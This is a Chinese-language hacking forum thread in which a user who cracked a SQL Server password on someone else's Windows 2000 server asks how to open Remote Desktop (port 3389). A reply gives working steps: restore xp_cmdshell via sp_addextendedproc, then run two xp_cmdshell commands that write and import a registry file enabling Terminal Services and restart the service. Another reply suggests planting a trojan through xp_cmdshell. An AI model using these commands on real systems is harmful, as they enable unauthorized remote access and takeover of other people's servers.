如何开3389啊
我用WINNTAutoAttack扫到sql口令但没开3389 怎样在WINNTAutoAttack上的sqlcmd上开启3389啊
求助啊 补充 看了他的c盘 没有Documents and Settings 不同的系统有不同的方法。。 能使用基于SQL的shell吗?也就是大家熟悉的"xp_cmdshell",如果不能使用,尝试下exec sp_addextendedproc 'xp_cmdshell','xplog70.dll'看看能不能恢复,如果可以,再尝试使用这个shell编写一个批处理,直接对注册表进行操作,然后开启对方的3389。 有那个sql的shell 对方是win2000server
你能不能说的详细点阿 谢了
我是菜鸟啊 我记不得太多了,因为现在手里的不是XP就是2003的系统,所以只能按照自己的模糊的记忆给你点提示了,不保证完全成功,你可以试试!
分别执行
命令一:[code]
exec [master].[dbo].[xp_cmdshell] 'cd \ && c: && echo Windows Registry Editor Version 5.00 > 1.reg && echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >> 1.reg && echo "ShutdownWithoutLogon"="0" >> 1.reg && echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >> 1.reg && echo "EnableAdminTSRemote"=dword:00000001 >> 1.reg && echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >> 1.reg && echo "TSEnabled"=dword:00000001 >> 1.reg && echo[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >> 1.reg && echo "PortNumber"=dword:00000D3D >> 1.reg'
[/code]命令二:[code]
exec [master].[dbo].[xp_cmdshell] 'regedit /s c:\1.reg && net stop "Terminal Server" && net start "Terminal Server"'
[/code]给你写了两条命令,这两条命令全部是在SQL的shell里面使用的,由于写的比较急,可能还存在问题吧,你可以试试! 哦 非常谢谢 我连了 可问题又来了 我输入正确的用户名密码后 提示用户名或密码错误
对方是内网 不知道和这个有没有关系 还提醒你一下,既然你都能执行xp_cmdshell了,为什么你还要去开别人的3389,还要去想办法主动连接别人,你就不能直接弄个马上去,使用xp_cmdshell执行了搞定吗?
何必这么麻烦!?
页:
[1]